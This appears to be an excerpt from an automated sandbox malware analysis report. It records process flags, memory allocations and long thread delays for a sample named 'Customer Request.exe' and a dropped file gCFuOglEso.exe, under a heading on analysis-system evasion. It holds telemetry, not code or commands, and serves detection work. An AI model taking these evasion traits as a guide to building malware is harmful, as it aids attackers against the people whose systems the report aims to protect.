                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 1010000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 2A50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 4A50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 8E80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 9E80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: A090000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: B090000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: B6E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: C6E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: D6E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 12C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 3080000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 2DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 9A50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: AA50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: 9A50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: C080000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Memory allocated: D080000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: B10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 2520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 2430000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 83C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 93C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 95C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: A5C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: ABF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: BBF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 2960000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 2A00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 4A00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 9520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: A520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: A750000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 9F20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Memory allocated: 8620000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 240000
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239843
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239731
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239624
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239515
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239406
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239269
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 239140
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 238996
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 238848
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 238718
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 238437
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 238031
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 237484
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 237371
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 237218
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 237062
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599891
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599781
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599671
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599562
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599451
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599344
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599235
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 599110
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598985
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598860
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598735
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598610
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598485
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598360
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598235
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 598110
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597985
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597860
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597736
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597610
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597485
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597361
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597167
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 597041
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596640
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596531
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596422
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596313
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596188
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 596063
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595938
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595813
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595703
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595594
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595469
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595360
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595235
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 595110
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594985
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594860
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594735
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594610
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594485
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594360
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594235
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 594110
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 593938
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 593799
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 593672
                  Source: C:\Users\user\Desktop\Customer Request.exe | Thread delayed: delay time: 593563
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239870
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239764
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239640
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239531
